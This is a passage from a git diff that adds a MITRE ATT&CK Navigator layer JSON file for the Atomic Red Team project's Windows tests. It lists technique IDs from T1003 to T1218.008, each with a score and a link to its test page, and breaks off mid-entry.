Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index e69de29b..a66e45f7 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json 
@@ -0,0 +1 @@ +{"version":"4.3","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":100,"enabled":true,"links":[{"label":"View 